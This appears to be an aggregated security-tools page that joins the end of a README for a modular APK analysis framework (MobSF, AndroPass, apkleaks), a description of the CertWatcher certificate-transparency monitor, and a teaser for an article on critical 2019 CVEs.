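For instance, the options above could be combined as follows; the file names are hypothetical, and the exact order of commands inside the menu is not prescribed by the documentation:

  SET output demo-scan            # output file name, written to the result directory
  SET json-out demo-scan.json     # JSON output file name, also written to the result directory
  SET pattern custom-rules.json   # pattern file that must already exist in the pattern directory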

Mobfs

MobFS is pretty straightforward; only the port number must be taken care of, and it is port 5000 by default. You just need to start the program and connect to 127.0.0.1:5000 in your browser.

AndroPass

AndroPass is also really straightforward: it just takes the file as input and does its job without any other inputs.

Architecture:

The APK analysis framework will follow a modular architecture, similar to Metasploit. It will consist of the following modules:

  • Core module: The core module will provide the basic functionality of the framework, such as command-line interface, input/output handling, and logging.
  • Static analysis module: The static analysis module will be responsible for analyzing the structure and content of APK files, such as the manifest file, resources, and code.
  • Dynamic analysis module: The dynamic analysis module will be responsible for analyzing the behavior of APK files, such as network traffic, API calls, and file system interactions.
  • Reverse engineering module: The reverse engineering module will be responsible for decompiling and analyzing the source code of APK files.
  • Vulnerability testing module: The vulnerability testing module will be responsible for testing the security of APK files, such as identifying vulnerabilities and exploits.

Adding more

Currently there are only three integrated tools, but more can be added if wanted. These are the things to consider:

  • Installer function
  • Separate tool function
  • Main function

Installer Function

  • Must edit in config/installer.py
  • The main thing to consider in the installer is the link of the repository.
  • Keep the cloning and the directory handling in a try-except block to avoid errors.
  • Choose an appropriate command for further installation.

Separate tool function

  • Must edit in config/mobfs.py, config/androp.py, or config/apkleaks.py
  • Write a new function for the specific tool
  • File handling is up to you; I recommend passing the file name as an argument and then using that name to locate the file in the subprocess call
  • It is also recommended to wrap the tool calls in a try-except block to avoid unwanted errors.

Main Function

  • A new case must be added to the switch function to act as a main function holder
  • The help menu listing and commands are up to your requirements and comfort

If you want, you can make your own upgrades and add them to this repository for more people to use, helping this tool grow.



Certwatcher - Tool For Capture And Tracking Certificate Transparency Logs, Using YAML Templates Based DSL


CertWatcher is a tool for capturing and tracking certificate transparency logs, using YAML templates. The tool helps detect and analyze websites using regular expression patterns and is designed for ease of use by security professionals and researchers.


Certwatcher continuously monitors the certificate data stream and checks for patterns or malicious activity. Certwatcher can also be customized to detect specific phishing pages, exposed tokens, and secret API key patterns using regular expressions defined by YAML templates.

Get Started

Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.

Useful Links

Contribution

If you want to contribute to this project, follow the steps below:

  • Fork this repository.
  • Create a new branch with your feature: git checkout -b my-new-feature
  • Make changes and commit the changes: git commit -m 'Adding a new feature'
  • Push to the original branch: git push origin my-new-feature
  • Open a pull request.

Authors






Top 5 Critical CVE Vulnerabilities from 2019 That Every CISO Must Patch Before He Gets Fired!

The number of vulnerabilities continues to increase so much that the technical teams in charge of patch management find themselves drowning in a myriad of critical and urgent tasks. Therefore, we have taken the time to review the profile of the most critical vulnerabilities and issues that impacted the year 2019. After this frenzy during […]